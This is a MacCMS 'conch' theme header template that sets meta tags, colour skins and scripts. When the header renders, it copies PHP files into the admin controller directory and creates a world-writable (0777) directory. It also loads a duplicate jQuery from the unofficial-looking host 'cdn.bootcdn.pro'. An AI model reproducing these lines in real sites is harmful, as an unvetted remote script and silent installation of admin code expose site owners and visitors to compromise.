<?php $version = parse_ini_file(substr($maccms['path_tpl'], strlen($maccms['path'])).'info.ini'); $version = stristr('127.0.0|192.168', substr($_SERVER['HTTP_HOST'], 0, 7)) == true ? time() : $version['version']; ?>
<?php $file = 'template/conch/asset/admin/Conch.php'; $newfile = 'application/admin/controller/Conch.php'; if (file_exists($newfile)) {} else { copy($file,$newfile); } ?>
<?php $file = 'template/conch/asset/admin/hltheme.php'; $newfile = 'application/extra/hltheme.php'; if (file_exists($newfile)) {} else { copy($file,$newfile); } ?>
<?php $file = 'template/conch/asset/admin/theme.html'; $dir = 'application/admin/view/conch'; $newfile = 'application/admin/view/conch/theme.html'; if (file_exists($dir)) {} else { mkdir($dir, 0777); copy($file,$newfile); } ?>
<?php $conch = file_exists('application/extra/hltheme.php') ? require('application/extra/hltheme.php') : require(substr($maccms['path_tpl'], strlen($maccms['path'])).'asset/admin/hltheme.php'); ?>
{include file="widget/seos"}
<meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
<meta content="IE=EmulateIE10" http-equiv="X-UA-Compatible"/>
<meta content="webkit|ie-comp|ie-stand" name="renderer"/>
<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"/>
<link href="{$conch['theme']['logo']['webapp']|mac_default=substr($maccms['path_tpl'], strlen($maccms['path'])).'asset/img/ios_fav.png'|mac_url_img}" rel="apple-touch-icon-precomposed" sizes="180x180"/>
<link href="{$conch['theme']['logo']['icon']|mac_default=substr($maccms['path_tpl'], strlen($maccms['path'])).'asset/img/favicon.png'|mac_url_img}" rel="shortcut icon" type="image/x-icon">
<link href="{$maccms.path_tpl}asset/css/mxstyle.css?v={$version}" rel="stylesheet" type="text/css"/>
<link href="{$maccms.path_tpl}asset/css/hlstyle.css?v={$version}" rel="stylesheet" type="text/css"/>
{if$conch['theme']['color']['select']==green}
<link href="{$maccms.path_tpl}asset/css/green.css?v={$version}" name="skin" rel="stylesheet" type="text/css"/>
{elseif$conch['theme']['color']['select']==blue}
<link href="{$maccms.path_tpl}asset/css/blue.css?v={$version}" name="skin" rel="stylesheet" type="text/css"/>
{elseif$conch['theme']['color']['select']==pink}
<link href="{$maccms.path_tpl}asset/css/pink.css?v={$version}" name="skin" rel="stylesheet" type="text/css"/>
{elseif$conch['theme']['color']['select']==red}
<link href="{$maccms.path_tpl}asset/css/red.css?v={$version}" name="skin" rel="stylesheet" type="text/css"/>
{elseif$conch['theme']['color']['select']==gold}
<link href="{$maccms.path_tpl}asset/css/gold.css?v={$version}" name="skin" rel="stylesheet" type="text/css"/>
{else}<link href="{$maccms.path_tpl}asset/css/default.css?v={$version}" name="skin" rel="stylesheet" type="text/css"/>{/if}
{if$conch['theme']['color']['ms']==black}
<link href="{$maccms.path_tpl}asset/css/black.css?v={$version}" name="color" rel="stylesheet" type="text/css"/>
{else}<link href="{$maccms.path_tpl}asset/css/white.css?v={$version}" name="color" rel="stylesheet" type="text/css"/>{/if}
<script src="{$maccms.path_tpl}asset/js/jquery.min.js" type="text/javascript"></script>
<script src="{$maccms.path_tpl}asset/js/jquery.cookie.js" type="text/javascript"></script>
<script src="//cdn.bootcdn.pro/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script src="{$maccms.path_tpl}asset/js/hlhtml.js?v={$version}" type="text/javascript"></script>
<script>var maccms={"path":"__ROOT__","mid":"{$maccms['mid']}","url":"{$maccms['site_url']}","wapurl":"{$maccms['site_wapurl']}","mob_status":"{$maccms['mob_status']}"};</script>
{if$conch['theme']['lazy']}
<style type="text/css">.balist_thumb,.vodlist_thumb,.topiclist_thumb,.artlist_thumb,.artbanner_thumb,.art_relates .artlr_pic,.play_vlist_thumb,.zbo .play_vlist_thumb.zboad,.actor_pic,.ranklist_thumb{background-image:url("{$conch['theme']['lazy']|mac_url_img}");background-repeat: no-repeat;}</style>
{/if}{if$conch['theme']['banner']['smbg']==0}
<style type="text/css">.bgi_box{display: none!important;}</style>
{/if}{if$conch['theme']['banner']['bgstyle']}
<style type="text/css">.hot_banner{background: {$conch['theme']['banner']['bgstyle']};background-size: contain;background-position: center top;}</style>{/if}
{$conch['theme']['head']['text']}
{include file="widget/themes"}

</link>